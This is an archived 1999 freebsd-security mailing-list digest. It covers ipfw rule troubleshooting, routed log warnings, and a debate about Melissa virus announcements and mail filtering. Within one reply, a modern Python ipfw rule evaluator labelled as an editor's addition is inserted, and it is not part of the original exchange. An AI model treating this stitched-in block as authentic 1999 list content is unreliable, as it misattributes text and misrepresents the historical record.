From owner-freebsd-security Sun Mar 28 04:27:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) by hub.freebsd.org (Postfix) with ESMTP id 4B55914FCA; Sun, 28 Mar 1999 04:26:18 -0800 (PST) (envelope-from noor@NetVision.net.il)
Received: from nvt (nvt.netvision.net.il [194.90.6.14]) by alpha.netvision.net.il (8.9.3/8.8.6) with ESMTP id OAA03292; Sun, 28 Mar 1999 14:25:47 +0200 (IST)
Date: Sun, 28 Mar 1999 14:23:57 +0200 (IST)
From: Noor Dawod
To: freebsd-hackers@freebsd.org
Subject: ipfw behavior, is it normal?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi..

Like many others have done before me, this is my first message to this mailing list and I hope not the last.

I've been dealing with FreeBSD for quite some time now, and I still cannot understand why a few ipfw rules don't work for me. I would like to share it with you and maybe get some help on it.

My current ipfw rules are:

-----------------------------------------------------------------
00100 allow ip from any to any via lo0
00200 allow ip from [machine-a-ip] to [server-ip] via xl0
00300 allow ip from [machine-b-ip] to [server-ip] via xl0
00400 allow ip from any to [server-ip] 80 in via xl0
00500 allow ip from any to [server-ip] 21 in via xl0
65000 allow ip from any to any
65535 deny ip from any to any
-----------------------------------------------------------------

00200 and 00300 seem redundant because of rule 65000. But this is where all the problem lies. If I understand the ipfw rules right, if I remove line 65000 from the rules table, then I can still do all ip-related actions from [machine-a] and [machine-b], whose ip numbers are listed in 00200 and 00300. But, once I remove line 65000, I cannot do any ip-related actions on the [server], and even WWW/FTP services are not served as well.
What am I missing here, and why MUST the 65000 line be there so that I can access [server] from [machine-a] and [machine-b]?

I apologize if this is not the place to ask such questions, and would like to be told where to send it instead.

Thanks for your time and efforts.

Noor

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Mar 28 12:14:00 1999
Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id E1B6614C48; Sun, 28 Mar 1999 12:13:51 -0800 (PST) (envelope-from fbsd-security@ursine.com)
Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id MAA32091; Sun, 28 Mar 1999 12:13:19 -0800 (PST) (envelope-from fbsd-security@ursine.com)
Message-ID: <199903281213260190.4BEF77D0@quaggy.ursine.com>
X-Mailer: Calypso Evaluation Version 3.00.00.13 (2)
Date: Sun, 28 Mar 1999 12:13:26 -0800
From: "Michael Bryan"
To: "Noor Dawod"
Cc: freebsd-security@freebsd.org
Subject: Re: ipfw behavior, is it normal?
Content-Type: text/plain; charset="us-ascii"

On 3/28/99 at 2:23 PM Noor Dawod wrote:

> My current ipfw rules are:
>
> -----------------------------------------------------------------
> 00100 allow ip from any to any via lo0
> 00200 allow ip from [machine-a-ip] to [server-ip] via xl0
> 00300 allow ip from [machine-b-ip] to [server-ip] via xl0
> 00400 allow ip from any to [server-ip] 80 in via xl0
> 00500 allow ip from any to [server-ip] 21 in via xl0
> 65000 allow ip from any to any
> 65535 deny ip from any to any
> -----------------------------------------------------------------

If you remove rule 65000, then you have no rules to allow any traffic -out- of your system.
If you wanted to fully open up traffic to machine-a and machine-b, then you could have these rules:

00250 allow ip from [server-ip] to [machine-a-ip] via xl0
00350 allow ip from [server-ip] to [machine-b-ip] via xl0

Similarly, you need counterparts to rules 400 and 500 for the outbound side. (You should also be specifying "tcp" in those rules, not "ip".) The http port is easy enough:

00450 allow tcp from [server-ip] 80 to any out via xl0

(Assuming you're using a single IP address and a single port with your HTTP server, of course.)

FTP access is a little trickier, thanks to the data port used by FTP, and the issues of active vs passive FTP. I'd recommend looking at a good firewall security book, such as the O'Reilly book. (www.ora.com) There are a number of ways to open up FTP access, each with their own set of pros and cons.

Michael Bryan
fbsd-security@ursine.com

From owner-freebsd-security Sun Mar 28 12:21:44 1999
Received: from quaggy.ursine.com (lambda.blueneptune.com [209.133.45.179]) by hub.freebsd.org (Postfix) with ESMTP id D343515637; Sun, 28 Mar 1999 12:21:42 -0800 (PST) (envelope-from fbsd-security@ursine.com)
Received: from michael (lambda.ursine.com [209.133.45.69]) by quaggy.ursine.com (8.9.2/8.9.2) with ESMTP id MAA32136; Sun, 28 Mar 1999 12:20:56 -0800 (PST) (envelope-from fbsd-security@ursine.com)
Message-ID: <199903281221020900.4BF6702B@quaggy.ursine.com>
In-Reply-To: <199903281213260190.4BEF77D0@quaggy.ursine.com>
References: <199903281213260190.4BEF77D0@quaggy.ursine.com>
X-Mailer: Calypso Evaluation Version 3.00.00.13 (2)
Date: Sun, 28 Mar 1999 12:21:02 -0800
From: "Michael Bryan"
To: "Noor Dawod"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw behavior, is it normal?
Content-Type: text/plain; charset="us-ascii"

> I'd recommend looking at a good firewall security book,
> such as the O'Reilly book. (www.ora.com)

BTW, here's the URL leading directly to O'Reilly's page about this book:

http://www.oreilly.com/catalog/fire/

Michael Bryan
fbsd-security@ursine.com

From owner-freebsd-security Sun Mar 28 12:28:31 1999
Received: from smtp.thegrid.net (smtp.thegrid.net [209.162.1.11]) by hub.freebsd.org (Postfix) with SMTP id 3236614CF7; Sun, 28 Mar 1999 12:28:26 -0800 (PST) (envelope-from dean@thegrid.net)
Received: (qmail 23031 invoked from network); 28 Mar 1999 20:28:06 -0000
Received: from pop.thegrid.net (209.162.1.5) by smtp.thegrid.net with SMTP; 28 Mar 1999 20:28:06 -0000
Received: from zippy (lax-ts5-h2-47-226.ispmodems.net [209.162.47.226]) by pop.thegrid.net (8.9.1a/8.9.1) with SMTP id MAA12725; Sun, 28 Mar 1999 12:28:05 -0800 (PST)
Message-Id: <4.1.19990328120848.009ab150@mail.thegrid.net>
X-Sender: i289861@mail.thegrid.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Sun, 28 Mar 1999 12:23:46 -0800
To: Noor Dawod, freebsd-security@freebsd.org
From: Dean
Subject: Re: ipfw behavior, is it normal?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

At 02:23 PM 3/28/99 +0200, you wrote:
> My current ipfw rules are:
>
> -----------------------------------------------------------------
> 00100 allow ip from any to any via lo0
> 00200 allow ip from [machine-a-ip] to [server-ip] via xl0
> 00300 allow ip from [machine-b-ip] to [server-ip] via xl0
> 00400 allow ip from any to [server-ip] 80 in via xl0
> 00500 allow ip from any to [server-ip] 21 in via xl0
> 65000 allow ip from any to any
> 65535 deny ip from any to any
> -----------------------------------------------------------------
>
> 00200 and 00300 seem redundant because of rule 65000. But this is where
> all the problem lies. If I understand the ipfw rules right, if I remove
> line 65000 from the rules table, then I can still do all ip-related
> actions from [machine-a] and [machine-b], whose ip numbers are
> listed in 00200 and 00300. But, once I remove line 65000, I cannot do any
> ip-related actions on the [server], and even WWW/FTP services are not
> served as well.
>
> What am I missing here, and why MUST the 65000 line be there so that I
> can access [server] from [machine-a] and [machine-b]?

Rule 65000 makes all the other rules before it redundant.

This ruleset (if you remove line 65000) will only allow connections from machine a and b to the server. Plus http and ftp connections from anywhere to the server.

Is xl0 your 'inside' interface or 'outside' interface?

Make sure you've got the right ip addresses for machine a and b.

Is the firewall running on the server or some other machine?

Dean

-------------------------------------------------------------------------------
A train stops at a train station, a bus stops at a bus station.
On my desk, I have a workstation....
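The behaviour this thread turns on is ipfw's first-match evaluation: rules are walked in ascending number order, the first rule that matches a packet decides its fate, and rule 65535 denies whatever nothing else matched. The following is an added example from the editor, not text or code from any of the posters: a small Python evaluator that loads Noor's ruleset and the outbound counterparts Michael Bryan suggested, then traces a few constructed packets through three variants (as posted, with 65000 removed, and with 65000 removed plus the fix). The bracketed addresses are the thread's own placeholders; [client-ip] and [other-ip] are additional placeholders, the packets are constructed, and port matching is simplified (a rule with a port qualifier is taken to match only TCP or UDP).

```python
# Toy first-match evaluator for the ipfw rules in this thread (constructed
# example): rules are walked in ascending number order, the first match
# decides, and the implicit rule 65535 denies whatever nothing else matched.
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    proto: str                # "tcp", "udp" or "icmp"
    src: str
    sport: Optional[int]
    dst: str
    dport: Optional[int]
    iface: str                # interface the packet is seen on, e.g. "xl0"
    direction: str            # "in" or "out" relative to the host


@dataclass(frozen=True)
class Rule:
    number: int
    action: str               # "allow" or "deny"
    proto: str                # "ip" matches every protocol
    src: str                  # address placeholder or "any"
    sport: Optional[int]
    dst: str
    dport: Optional[int]
    direction: Optional[str]  # "in", "out" or None for both
    iface: Optional[str]      # "via xl0" -> "xl0"; None for any interface


def parse_rule(text: str) -> Rule:
    """Parse one line of the ipfw syntax subset used in the thread."""
    tok = text.split()
    number, action, proto = int(tok[0]), tok[1], tok[2]   # tok[3] is "from"
    src, sport, i = tok[4], None, 5
    if tok[i].isdigit():                    # optional source port
        sport, i = int(tok[i]), i + 1
    dst, dport, i = tok[i + 1], None, i + 2  # tok[i] is "to"
    if i < len(tok) and tok[i].isdigit():   # optional destination port
        dport, i = int(tok[i]), i + 1
    direction = iface = None
    while i < len(tok):                     # trailing "in" / "out" / "via <if>"
        if tok[i] in ("in", "out"):
            direction, i = tok[i], i + 1
        elif tok[i] == "via":
            iface, i = tok[i + 1], i + 2
        else:
            raise ValueError(f"rule {number}: unsupported token {tok[i]!r}")
    return Rule(number, action, proto, src, sport, dst, dport, direction, iface)


def load(text: str) -> List[Rule]:
    return [parse_rule(line) for line in text.strip().splitlines()]


def matches(rule: Rule, pkt: Packet) -> bool:
    if rule.proto not in ("ip", pkt.proto):
        return False
    if rule.src != "any" and rule.src != pkt.src:
        return False
    if rule.dst != "any" and rule.dst != pkt.dst:
        return False
    if rule.sport is not None or rule.dport is not None:
        # Simplification: a port qualifier only ever matches TCP or UDP.
        if pkt.proto not in ("tcp", "udp"):
            return False
        if rule.sport not in (None, pkt.sport) or rule.dport not in (None, pkt.dport):
            return False
    if rule.direction not in (None, pkt.direction):
        return False
    return rule.iface in (None, pkt.iface)


def evaluate(rules: List[Rule], pkt: Packet) -> Tuple[int, str]:
    """(rule number, action) of the first matching rule, else the 65535 default."""
    for rule in sorted(rules, key=lambda r: r.number):
        if matches(rule, pkt):
            return rule.number, rule.action
    return 65535, "deny"


# Noor's ruleset as posted, and the outbound counterparts Michael suggested.
NOOR_RULES = """
00100 allow ip from any to any via lo0
00200 allow ip from [machine-a-ip] to [server-ip] via xl0
00300 allow ip from [machine-b-ip] to [server-ip] via xl0
00400 allow ip from any to [server-ip] 80 in via xl0
00500 allow ip from any to [server-ip] 21 in via xl0
65000 allow ip from any to any
65535 deny ip from any to any
"""
OUTBOUND_FIX = """
00250 allow ip from [server-ip] to [machine-a-ip] via xl0
00350 allow ip from [server-ip] to [machine-b-ip] via xl0
00450 allow tcp from [server-ip] 80 to any out via xl0
"""


def trace_thread_scenarios() -> Dict[str, Tuple[int, str]]:
    """Constructed packets traced through three variants of the ruleset."""
    original = load(NOOR_RULES)
    without_65000 = [r for r in original if r.number != 65000]
    fixed = without_65000 + load(OUTBOUND_FIX)
    ssh_in = Packet("tcp", "[machine-a-ip]", 40000, "[server-ip]", 22, "xl0", "in")
    ssh_reply = Packet("tcp", "[server-ip]", 22, "[machine-a-ip]", 40000, "xl0", "out")
    http_in = Packet("tcp", "[client-ip]", 51000, "[server-ip]", 80, "xl0", "in")
    http_reply = Packet("tcp", "[server-ip]", 80, "[client-ip]", 51000, "xl0", "out")
    other_in = Packet("tcp", "[other-ip]", 42000, "[server-ip]", 22, "xl0", "in")
    return {
        "ssh_in/original": evaluate(original, ssh_in),               # rule 200
        "other_in/original": evaluate(original, other_in),           # 65000 admits it
        "ssh_reply/original": evaluate(original, ssh_reply),         # 65000 again
        "ssh_reply/no_65000": evaluate(without_65000, ssh_reply),    # nothing allows out
        "http_in/no_65000": evaluate(without_65000, http_in),        # rule 400
        "http_reply/no_65000": evaluate(without_65000, http_reply),  # nothing allows out
        "ssh_reply/fixed": evaluate(fixed, ssh_reply),               # rule 250
        "http_reply/fixed": evaluate(fixed, http_reply),             # rule 450
        "other_in/fixed": evaluate(fixed, other_in),                 # still denied
    }
```

Running `trace_thread_scenarios()` shows both halves of the thread's answer at once: with rule 65000 present, every packet that rules 100 to 500 do not claim, including a login attempt from [other-ip], falls through to 65000 and is allowed, which is why those earlier rules looked redundant; with 65000 removed, the inbound SYN from machine-a still matches rule 200, but the server's own reply leaves out via xl0 and matches nothing before 65535, so the connection never completes. Adding the 00250/00350/00450 counterparts lets the replies out while leaving [other-ip] denied.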
-------------------------------------------------------------------------------

From owner-freebsd-security Mon Mar 29 09:56:59 1999
Received: from xwin.nmhtech.com (xwin.nmhtech.com [208.138.46.10]) by hub.freebsd.org (Postfix) with ESMTP id 0875815947; Mon, 29 Mar 1999 09:56:53 -0800 (PST) (envelope-from nicole@xwin.nmhtech.com)
Received: by xwin.nmhtech.com (Postfix, from userid 1001) id E03822EE1A; Mon, 29 Mar 1999 09:56:34 -0800 (PST)
Content-Length: 1514
X-Mailer: XFMail 1.2 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
Date: Mon, 29 Mar 1999 09:56:34 -0800 (PST)
From: Nicole Harrington
To: freebsd-security@freebsd.org
Subject: Someone trying to route to my machine?

Below are some messages I don't understand. Is someone trying to route to my machine to do something? The forwarding is because I have the logs being sent to my workstation machine as well as stored locally. I received abt 50 of them. Whoever they are, they were persistent!

Any assistance would be appreciated.
Thanks
Nicole

Mar 29 03:47:43 ton Forwarded from XXXXXXX: Forwarded from XXXXXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0 impossibly lacks ifp
Mar 29 03:47:43 ton Forwarded from XXXXX: Forwarded from XXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0 impossibly lacks ifp

 |\ __ /|   (`\
 | o_o |__   ) )
 //  \\
nicole@nmhtech.com          | http://www.webweaver.net/
webmistress@dangermouse.org | http://www.dangermouse.org
-------------------------(((---(((-----------------------
- Powered by Coka Cola and FreeBSD -
- Strong enough for a man - But made for a Woman -
- I'm not ADD - I'm just Multithreaded -
- Microsoft: What bug would you like today? -
----------------------------------------------------------
SYSADMIN(1)
Sysadmin is the keeper of all things computer, is generally harangued, must be supplied with caffeine, chocolate, and sushi in order to function properly, cannot be exposed to direct sunlight, and must not be allowed to have a life.

From owner-freebsd-security Mon Mar 29 12:32:47 1999
Received: from belem.libnet.com.br (belem.libnet.com.br [200.242.252.66]) by hub.freebsd.org (Postfix) with ESMTP id E04A514CD1; Mon, 29 Mar 1999 12:31:44 -0800 (PST) (envelope-from misty@biosys.net)
Received: from master (m24.libnet.com.br [200.242.252.150]) by belem.libnet.com.br (8.9.3/8.9.3) with SMTP id RAA13811; Mon, 29 Mar 1999 17:36:12 -0300
Message-Id: <3.0.3.32.19990329173110.0070e480@pop.libnet.zaz.com.br>
X-Sender: brm.bel@pop.libnet.zaz.com.br
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.3 (32)
Date: Mon, 29 Mar 1999 17:31:10 -0300
To: Bob Vaughan, agora@agoractvm.com.br, bishop@sekure.org
From: Misty
Subject: Re: NOVO VIRUS.
Cc: admin@suntelnetwork.net, alessandrofm@nitnet.com.br, bk@linuxbr.com.br, bmfrio@parxtech.com.br, bos@sekure.org, brodbeck@tro.matrix.com.br, colpani@furb.rct-sc.br, cox@sinistro.net, darklady@zipmail.com.br, eleet@sekure.org, freebsd-security@FreeBSD.ORG, grlink@infolink.com.br, hc_@linuxbr.com.br, isc@suntelnetwork.net, jamez@sekure.org, luciana@mtec.com.br, nelsonbrito@netscape.net, niusin@montreal.com.br, paranoia@sekure.org, pjr@ruralrj.com.br, SECRETARIA@bvrj.com.br, silveira@esquadro.com.br, suid-bit@usa.net
In-Reply-To: <199903242310.PAA06293@tantivy.stanford.edu>
Mime-Version: 1.0
Content-Type: multipart/encrypted; boundary="=--"; protocol="application/pgp-encrypted"

--=--
Content-Type: application/pgp-encrypted

Version: 1

--=--
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 5.5.3i for non-commercial use

[PGP-encrypted message body omitted]
-----END PGP MESSAGE-----

--=----

From owner-freebsd-security Mon Mar 29 12:49:37 1999
Received: from mail.rapidsite.net (mail.rapidsite.net [207.158.192.62]) by hub.freebsd.org (Postfix) with SMTP id A105A14E66; Mon, 29 Mar 1999 12:49:36 -0800 (PST) (envelope-from gryphon@intech.net)
Received: from gw1.hway.net (207.158.192.37) by mail.rapidsite.net (RS ver 1.0.2) with SMTP id 21182; Mon, 29 Mar 1999 15:49:11 -0500 (EST)
Message-ID: <36FFE82E.9FF42BF9@intech.net>
Date: Mon, 29 Mar 1999 15:53:02 -0500
From: Coranth Gryphon
Reply-To: gryphon@hway.net
X-Mailer: Mozilla 4.08 [en] (WinNT; I)
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: virus announcements?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Loop-Detect: 1

I know that this is a general security list, but is it appropriate to post virus announcements here for beasties which cannot affect FreeBSD (or any unix) directly?

-coranth

PS> And maybe it's just me, but sending a virus alert about attachments and putting the data in an attachment, seems to defeat the purpose...
---------------------------------------+----------------------------
Coranth Gryphon                        | Work Phone: 561-912-2497
Chief Architect, Hiway Technologies    | #include
---------------------------------------+----------------------------
When all else fails, do the impossible.

From owner-freebsd-security Mon Mar 29 12:53:40 1999
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 856BD14D56; Mon, 29 Mar 1999 12:53:39 -0800 (PST) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id MAA34668; Mon, 29 Mar 1999 12:53:12 -0800 (PST) (envelope-from dillon)
Date: Mon, 29 Mar 1999 12:53:12 -0800 (PST)
From: Matthew Dillon
Message-Id: <199903292053.MAA34668@apollo.backplane.com>
To: Coranth Gryphon
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: virus announcements?
References: <36FFE82E.9FF42BF9@intech.net>

:I know that this is a general security list, but is it appropriate
:to post virus announcements here for beasties which cannot affect
:FreeBSD (or any unix) directly?

    No. I don't think anyone here is really interested in hearing about semi-intelligent programmers writing viruses that exploit big gaping holes in OSs that have been known to have said big gaping holes for untold years.

    Some idiot in the press called these things viruses. They aren't viruses, they're clue sticks. WHAP!

                                        -Matt
                                        Matthew Dillon

:-coranth
:
:PS> And maybe it's just me, but sending a virus alert about attachments
:and putting the data in an attachment, seems to defeat the purpose...
:
:---------------------------------------+----------------------------
: Coranth Gryphon                       | Work Phone: 561-912-2497

From owner-freebsd-security Mon Mar 29 13:10:34 1999
Received: from mail.tepucom.nl (mail.tepucom.nl [195.81.12.5]) by hub.freebsd.org (Postfix) with ESMTP id AECF3154E2; Mon, 29 Mar 1999 13:10:30 -0800 (PST) (envelope-from theo@tepucom.nl)
Received: from kantoor-1.tepucom.nl (localhost [127.0.0.1]) by mail.tepucom.nl (8.8.5/SCO5) with SMTP id XAA03700; Mon, 29 Mar 1999 23:09:25 +0200 (CETDST)
Received: by kantoor-1.tepucom.nl with Microsoft Mail id <01BE7A39.860D5DA0@kantoor-1.tepucom.nl>; Mon, 29 Mar 1999 23:11:49 +-200
Message-ID: <01BE7A39.860D5DA0@kantoor-1.tepucom.nl>
From: "Theo Purmer (Tepucom)"
To: "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Virus Announcements
Date: Mon, 29 Mar 1999 23:11:48 +-200
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

If somebody should want to be informed about viruses and stuff, subscribe to the cert advisory list at http://www.cert.org

Theo Purmer
Tepucom
The Netherlands

From owner-freebsd-security Mon Mar 29 13:14:57 1999
Received: from mail.numachi.com (numachi.numachi.com [198.175.254.2]) by hub.freebsd.org (Postfix) with SMTP id DC45D14D21; Mon, 29 Mar 1999 13:14:29 -0800 (PST) (envelope-from reichert@numachi.com)
Received: (qmail 4334 invoked by uid 1001); 29 Mar 1999 21:14:06 -0000
Date: Mon, 29 Mar 1999 16:14:06 -0500
From: Brian Reichert
To: freebsd-security@FreeBSD.ORG
Subject: Re: virus announcements?
Message-ID: <19990329161406.G2501@numachi.com>
References: <36FFE82E.9FF42BF9@intech.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95i
In-Reply-To: <36FFE82E.9FF42BF9@intech.net>; from Coranth Gryphon on Mon, Mar 29, 1999 at 03:53:02PM -0500

On Mon, Mar 29, 1999 at 03:53:02PM -0500, Coranth Gryphon wrote:
> I know that this is a general security list, but is it appropriate
> to post virus announcements here for beasties which cannot affect
> FreeBSD (or any unix) directly?

>>>> info freebsd-security
FREEBSD-SECURITY          Security issues

FreeBSD computer security issues (DES, Kerberos, known security holes and fixes, etc).

So, I would think not. There are a number of well-established lists for virus warnings, and 'general' security problems.

Viruses, as these are discussed, are

- not a concern for a FreeBSD system, directly. If it is revealed that a virus 'tickles' a badly configured system utility, then notice should be sent out that the utility is badly configured (which is now the concern). I feel then that the virus is immaterial.

- not usually a concern for UNIX users, for (in general) they don't use tools that run arbitrary code. (That's why a lot of informed people turn off Java and Javascript in a browser.)

I feel that the core issue of UNIX security is to keep users (local or remote) from hurting each other, or the system. If they want to adopt practices wherein they hurt themselves, that's their problem.

> -coranth

Hey! Long time no see!

> PS> And maybe it's just me, but sending a virus alert about attachments
> and putting the data in an attachment, seems to defeat the purpose...

I've never seen a virus alert about an 'attachment'. I've seen alerts about specific document types, that may be stored in an attachment via email. Said document types may also be retrieved by a web browser, or utilized from a local hard drive.
In all of these cases, the virus is activated (i.e., granted control) _by the viewing tool_, not by the storage/retrieval/MIME mechanism. Configuring a personal environment that runs arbitrary code supplied from the internet is silly.

Pie In the Sky: it would not be an issue if people used real software.

And as for using attachments to store separate discrete documents, well, isn't that what they're _for_?

> ---------------------------------------+----------------------------
> Coranth Gryphon                        | Work Phone: 561-912-2497
> Chief Architect, Hiway Technologies    | #include
> ---------------------------------------+----------------------------
> When all else fails, do the impossible.

--
Brian 'you Bastard' Reichert        reichert@numachi.com
37 Crystal Ave. #303                Current daytime number: (603)-434-6842
Derry NH 03038-1713 USA             Intel architecture: the left-hand path

From owner-freebsd-security Mon Mar 29 13:17:20 1999
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id EA60F14D21; Mon, 29 Mar 1999 13:17:12 -0800 (PST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id XAA05184; Mon, 29 Mar 1999 23:16:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id XAA21300; Mon, 29 Mar 1999 23:16:46 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: "Theo Purmer (Tepucom)"
Cc: "'freebsd-security@FreeBSD.ORG'"
Subject: Re: Virus Announcements
In-reply-to: Your message of "Mon, 29 Mar 1999 23:11:48."
             <01BE7A39.860D5DA0@kantoor-1.tepucom.nl>
Date: Mon, 29 Mar 1999 23:16:46 +0200
Message-ID: <21298.922742206@critter.freebsd.dk>
From: Poul-Henning Kamp

In message <01BE7A39.860D5DA0@kantoor-1.tepucom.nl>, "Theo Purmer (Tepucom)" writes:
> if somebody should want to be informed about viruses and stuff
> subscribe to the cert advisory list at http://www.cert.org

www.sans.org is highly recommended from here.

And mind you, the two of you may sit in your own private heavens, but many of the rest of us work in the real world. This particular outbreak seems to warrant the original email.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon Mar 29 13:48:08 1999
Received: from phoenix.volant.org (phoenix.volant.org [205.179.79.193]) by hub.freebsd.org (Postfix) with ESMTP id 4173315141; Mon, 29 Mar 1999 13:48:06 -0800 (PST) (envelope-from patl@phoenix.volant.org)
Received: from asimov.phoenix.volant.org ([205.179.79.65]) by phoenix.volant.org with smtp (Exim 1.92 #8) id 10Rjsp-0001UE-00; Mon, 29 Mar 1999 13:47:47 -0800
Received: from localhost by asimov.phoenix.volant.org (SMI-8.6/SMI-SVR4) id NAA23930; Mon, 29 Mar 1999 13:47:41 -0800
Date: Mon, 29 Mar 1999 13:47:41 -0800 (PST)
From: patl@phoenix.volant.org
Reply-To: patl@phoenix.volant.org
Subject: Re: Virus Announcements
To: Poul-Henning Kamp
Cc: "Theo Purmer (Tepucom)", "'freebsd-security@FreeBSD.ORG'"
In-Reply-To: <21298.922742206@critter.freebsd.dk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII

> And mind you, the two of you
> may sit in your own private heavens,
> but many of the rest of us work in the real world. This particular
> outbreak seems to warrant the original email.

If by 'the real world' you mean an environment where you need to worry about virii that infect Windows, M$ Word documents, Excel spreadsheets, etc.; then you should be subscribed to one or more lists dedicated to those topics. Let's keep this list FreeBSD specific, please.

-Pat

From owner-freebsd-security Mon Mar 29 15:07:00 1999
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 4179515501; Mon, 29 Mar 1999 15:06:47 -0800 (PST) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA02595; Mon, 29 Mar 1999 16:03:04 -0700 (MST)
Message-Id: <4.2.0.32.19990329155900.00a557c0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta)
Date: Mon, 29 Mar 1999 16:03:00 -0700
To: patl@phoenix.volant.org, Poul-Henning Kamp
From: Brett Glass
Subject: Re: Virus Announcements
Cc: "Theo Purmer (Tepucom)", "'freebsd-security@FreeBSD.ORG'"
References: <21298.922742206@critter.freebsd.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

OK, here's something FreeBSD-specific we ought to do. Let's make up a FreeBSD package that installs John Hardin's e-mail sanitizing filters with some sane default settings that kill the Melissa virus.
John's filters can be found at ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html All we need to do is tweak the paths for FreeBSD, bring in procmail as a dependency, and tell the user how to configure Sendmail to use procmail as the local delivery agent. This would be something that could be touted as an advantage of using FreeBSD as a mail server. Of course, I'll probably be told that this is a bad idea because Jordan didn't think of it. --Brett Glass At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: >> And mind you, the two of you may sit in your own private heavens, >> but many of the rest of us work in the real world. This particular >> outbreak seems to warrant the original email. > >If by 'the real world' you mean an environment where you need to >worry about virii that infect Windows, M$ Word documents, Excell >spreadsheets, etc.; then you should be subscribed to one or more >lists dedicated to those topics. Let's keep this list FreeBSD >specific, please. > > > >-Pat > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 15:24:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id C28CB14C4F for ; Mon, 29 Mar 1999 15:24:41 -0800 (PST) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id RAA07912; Mon, 29 Mar 1999 17:24:18 -0600 (CST) From: Igor Roshchin Message-Id: <199903292324.RAA07912@alecto.physics.uiuc.edu> Subject: Re: Virus Announcements In-Reply-To: <4.2.0.32.19990329155900.00a557c0@localhost> from "Brett Glass" at "Mar 29, 1999 4: 3: 0 pm" To: brett@lariat.org (Brett Glass) Date: Mon, 29 Mar 1999 17:24:18 -0600 (CST) Cc: 
freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you are talking about using FreeBSD to filter Melissa virus (and some similar virus), you might consider tweaking the rulesets for sendmail. I haven't tried installing that ruleset, but the CERT advisory recommended: III. Solutions * Block messages with the signature of this virus at your mail transfer agents. With Sendmail Nick Christenson of sendmail.com provided information about configuring sendmail to filter out messages that may contain the Melissa virus. This information is available from the follow URL: ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m elissa-filter.txt Since sendmail is the default MTA in FreeBSD, this might be more universal to the general public (compared to procmail's rules/patches). IgoR PS. I agree that this list should contain only FreeBSD-related (or potentially related) issues. Other issues are important, but there are other lists for them - e.g. BUGTRAQ .. > OK, here's something FreeBSD-specific we ought to do. Let's make > up a FreeBSD package that installs John Hardin's e-mail sanitizing > filters with some sane default settings that kill the Melissa virus. > > John's filters can be found at > > ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html > > All we need to do is tweak the paths for FreeBSD, bring in > procmail as a dependency, and tell the user how 